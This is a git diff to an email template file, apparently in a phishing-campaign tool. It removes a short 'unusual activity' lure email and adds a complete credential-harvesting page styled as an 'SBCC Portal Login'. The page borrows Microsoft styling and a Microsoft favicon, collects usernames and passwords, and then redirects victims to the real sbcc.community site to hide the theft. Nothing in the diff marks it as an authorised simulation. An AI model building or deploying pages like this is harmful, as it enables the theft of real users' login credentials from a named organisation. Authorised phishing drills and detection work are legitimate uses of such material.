--- a/campaigns/email-template.html
+++ b/campaigns/email-template.html
@@ -1,15 +1,89 @@
 <!DOCTYPE html>
-<html>
-  <body>
-    <p>Hi {{.FirstName}},</p>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <title>SBCC Portal Login</title>
+  <link href="https://static2.sharepointonline.com/files/fabric/office-ui-fabric-core/11.0.0/css/fabric.min.css" rel="stylesheet">
+  <link rel="icon" href="https://c.s-microsoft.com/favicon.ico" />
+  <style>
+    body {
+      font-family: Segoe UI, sans-serif;
+      background-color: #f3f2f1;
+      margin: 0;
+      padding: 0;
+    }
 
-    <p>We've detected unusual activity on your account. For your safety, 
-please verify your login activity at the link below:</p>
+    .login-box {
+      width: 320px;
+      margin: 100px auto;
+      background: white;
+      padding: 30px;
+      border-radius: 4px;
+      box-shadow: 0 0 10px rgba(0,0,0,0.1);
+      text-align: center;
+    }
 
-    <p><a href="{{.URL}}">Review Activity</a></p>
+    .login-box img.logo {
+      margin-bottom: 20px;
+      max-width: 100%;
+      height: auto;
+    }
 
-    <p>Thanks,</p>
-    <p>IT Support</p>
-  </body>
+    input[type=email], input[type=password] {
+      width: 100%;
+      padding: 10px;
+      margin-bottom: 15px;
+      border: 1px solid #ccc;
+      border-radius: 2px;
+    }
+
+    input[type=submit] {
+      background-color: #0078d4;
+      color: white;
+      border: none;
+      padding: 10px;
+      width: 100%;
+      border-radius: 2px;
+    }
+
+    .forgot-password {
+      font-size: 13px;
+      margin-top: 10px;
+      color: #0078d4;
+      display: block;
+      text-decoration: none;
+    }
+
+    h2 {
+      font-size: 20px;
+      margin-bottom: 20px;
+    }
+  </style>
+</head>
+<body>
+  <div class="login-box">
+    <img
+      src=""
+      alt="Logo"
+      class="logo"
+      width="200"
+    />
+    <h2>SBCC Portal Login</h2>
+    <form method="POST" action="">
+      <input type="email" name="email" placeholder="Username" required />
+      <input type="password" name="password" placeholder="Password" required />
+      <input type="submit" value="Sign in" />
+    </form>
+    <a href="#" class="forgot-password">Forgot password?</a>
+  </div>
+
+  <script>
+    // Redirect user after 1.5 seconds of form submission
+    document.querySelector('form').addEventListener('submit', function () {
+      setTimeout(() => {
+        window.location.href = "https://www.sbcc.community/";
+      }, 1500);
+    });
+  </script>
+</body>
 </html>
-
